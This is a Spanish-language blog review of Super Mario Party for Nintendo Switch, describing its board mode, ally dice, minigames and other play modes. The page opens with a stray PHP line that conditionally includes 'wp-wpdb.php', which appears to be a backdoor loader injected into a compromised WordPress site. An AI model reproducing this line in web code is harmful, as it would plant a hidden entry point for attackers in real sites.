if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Super Mario Party – La Fortaleza de LeChuck

Análisis Super Mario Party

Nintendo vuelve a la carga con un nuevo y deseado Mario Party. El nuevo título de la saga para Switch se llama Super Mario Party, una especie de reinicio y vuelta a los orígenes en una consola diseñada especialmente para jugar en multijugador gracias a la inclusión de dos Joy-Con de base. Tiene buena pinta ¿verdad? Sigue leyendo y te contamos sus novedades y principales características.

Lo primero que necesitas saber es que en Super Mario Party jugamos con hasta cuatro amigos en modo local, y que cada jugador juega con un Joy-con de forma obligatoria, no es compatible con el mando Pro y no hay forma de jugar en modo portátil si no quitas al menos un Joy-Con. Esto, evidentemente, es porque el juego aprovecha todas sus tecnologías de movimiento y la vibración en los minijuegos, alma central de la jugabilidad en un Mario Party.

El modo principal y ya legendario de Mario Party es el tablero, claro está. Como en un juego de mesa, tiraremos dados y recorreremos casillas, y el azar determinará nuestro puesto en la partida. Cuando termina un turno… es la hora de los minijuegos! Todos contra todos si hemos caído en casillas azules, o entre nosotros si alguien ha caído en una roja. Siempre con la intención de conseguir el mayor número de estrellas al finalizar todos los turnos y así ganar la partida. Ya sabes, siempre hay una estrella posicionada de forma aleatoria en el tablero, y tu principal objetivo debe ser llegar el primero con monedas para adquirirla.

Una vez más tenemos distintos tipos de casillas, las azules sumarán monedas a nuestra cartera, las azules restarán, las verdes activarán eventos impredecibles en el juego (En el primer tablero, por ejemplo, una roca recorrerá toda una fila de casillas retrasando a todos los jugadores varias posiciones atrás). También tenemos las clásicas que nos permiten robar monedas o estrellas al azar, otras que nos permiten la compra de items para hacerlo nosotros mismos y los bloques ocultos con item «de gratis».

Como gran novedad, tenemos unas casillas que nos permiten sumar un aliado a nuestro equipo, otro personaje con un dado especial que siempre sumará o restará a nuestra puntuación con los dados y participará en muchas ocasiones de nuestro lado en los minijuegos. Además, tanto nosotros como nuestro aliado contaremos con un dado especial (cada personaje tiene el suyo único) a escoger con números sin un orden (Por ejemplo, tres lados del dado con un «uno», y tres con un «cinco») que nos permite apostar una vez más al azar nuestra tirada para llegar todo lo lejos que necesitamos. Es decir, que al menos tendremos, de primeras, un dado normal  clásico de seis números o el especial con un equilibrio distinto.

Al final de la partida, los jueces harán un recuento de las estrellas y monedas de cada uno de los jugadores, y como gran espectáculo, otorgará estrellas extra a los jugadores que hayan sido mejores en alguna de las claves del juego (El que haya conseguido más monedas a lo largo del juego, el que haya recorrido menos casillas, etc).

Los minijuegos nos permiten ganar más monedas,  necesarias para poder comprar las estrellas o ítems que siempre nos serán útiles para competir si el azar con los dados no está de nuestro lado. En esta edición hay un total de 80 repartidos en juegos de todos contra todos o formando diferentes equipos, siempre según la casilla en la que acabemos una ronda. Una vez más, estos minijuegos sacarán toda la «gracia» del control de la consola, así que disponte a aprovechar al máximo tus habilidades con el Joy-con tanto de movimiento como a la hora de captar la vibración especial del mando. Es interesante saber que si juegas con amigos que se estrenan, antes de cada minijuego hay un modo de práctica en el lobby sin tener que entrar y salir a ningún sitio, por lo que mientras os preparáis para competir, podréis practicar y pillar algo el tranquillo a los minijuegos antes de batirse en duelo.

El modo torrente de aventuras, es otra novedad añadida al nuevo Mario Party para Switch. En el deberemos remar en colaboración con los otros jugadores esquivando las rocas y cogiendo globos mientras bajamos los rápidos de un río.

El modo a dobles de Super Mario Party nos permite batirnos en un tablero en parejas 2 VS 2. El tablero coge mayor libertad ya que en todo momento puedes escoger el sentido en el que te quieres mover con tu dado, y podremos actuar por separado a nuestro compañero e idear tácticas conjuntas para hacernos con el mayor número de estrellas. Alguno de los tableros diseñados para un sentido, se ven algo modificados para encajar en esta filosofía, que también nos dará grandes piques con los amigos.

Otro modo nuevo, «A todo ritmo«, nos propone jugar a minijuegos musicales a base de ritmo como si de un «Rhythm Paradise» se tratara, y por supuesto, competir con nuestros amigos. Otras buenas risas aseguradas.

La Sala de recreo Toad aprovecha en unos pocos minijuegos la idea de utilizar dos consolas, como vimos desde los primeros tráilers del juego. Básicamente son minijuegos en los que necesitamos dos Switch y dos juegos para disfrutarlos, y a modo de experiencia, ya que son más bien escasos y no están incluidos en ningún otro modo. Digamos que son ideas sueltas de los creadores que han incluido aquí para nuestro disfrute.

El modo online, tan demandado como poco emocionante (¿quién quiere jugar a un juego de tablero online si la emoción de estos es tener a tus amigos cerca?) llega en este nuevo Super Mario Party, aunque si esperas eso, la modalidad principal para jugar online, vas desencaminado. Se trata de un paquete de escasos minijuegos para pasar el rato con amigos online, quizás lo más aprovechable del juego que sí tendría sentido en online, pero ha faltado poder jugar a la totalidad de minijuegos para ser un buen añadido al título.

Por último, tenemos un gran clásico en Mario Party, el modo de minijuegos libres, que nos permite simplemente jugar los minijuegos que ya hayamos desbloqueado con nuestros amigos sin tener que pasar por el juego de tablero. El sudor esta garantizado.

Super Mario Party devuelve a la saga varios detalles que no hemos tenido en las últimas entregas, y vuelve a generar esa diversión instántanea con nuestros amigos gracias a su malévolo azar y múltiples posibilidades estratégicas. Es una compra obligada si eres de los que invita a sus amigos a casa a jugar, pero si lo que te va es jugar sólo o con amigos online, no es tu juego. En OfertasJuegos puedes comprar Super Mario Party barato y al mejor precio, y en noviembre sale un pack muy interesante con dos Joy-Con y el juego a un precio muy especial.

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario